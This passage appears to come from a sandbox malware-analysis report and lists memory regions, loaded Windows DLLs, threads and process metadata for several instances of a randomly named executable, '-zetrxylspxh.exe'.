0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6000 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6001 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 6075 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 6076 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6077 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6078 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6079 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6080 start_va = 0x440000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 6081 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6082 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6083 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6084 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6085 start_va = 0x5e0000 end_va = 0x69dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6086 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6087 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6088 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6089 start_va = 0x6a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 6090 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 6187 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6188 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 6189 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 6190 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6191 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6192 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6193 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6194 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6195 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6196 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6197 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6198 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6199 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6200 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 6201 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 6202 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 6203 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 6204 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 6205 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6206 start_va = 0x7a0000 end_va = 0x927fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 6207 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 217 os_tid = 0xec0 Thread: id = 221 os_tid = 0xdbc Process: id = "63" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xba9d000" os_pid = "0x1300" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6007 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6008 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6009 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6010 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6011 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6012 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6013 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6014 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6015 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6016 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6017 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6018 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6019 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6020 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6021 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6022 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 6116 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 6117 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6118 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6119 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6120 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6121 start_va = 0x5b0000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 6122 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6123 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6124 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6125 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6126 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6127 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6128 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6129 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 6130 start_va = 0x5b0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 6131 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 6132 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 6213 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6214 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 6215 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 6216 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6217 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6218 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6219 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6220 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6221 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6222 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6223 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6224 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6225 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6226 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 6227 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 6228 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 6229 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 6230 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 6240 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6241 start_va = 0x810000 end_va = 0x997fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 6242 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 218 os_tid = 0xc3c Thread: id = 223 os_tid = 0x125c Process: id = "64" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x5eba2000" os_pid = "0xc50" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6048 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6049 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6050 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6051 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6052 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6053 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6054 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6055 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6056 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6057 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6058 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6059 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6060 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6061 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6062 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6063 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 6243 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6244 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6245 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6246 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6247 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6248 start_va = 0x480000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 6249 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6250 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6251 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6252 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6253 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6254 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6255 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6256 start_va = 0x480000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 6257 start_va = 0x500000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 6258 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 6259 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 6260 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 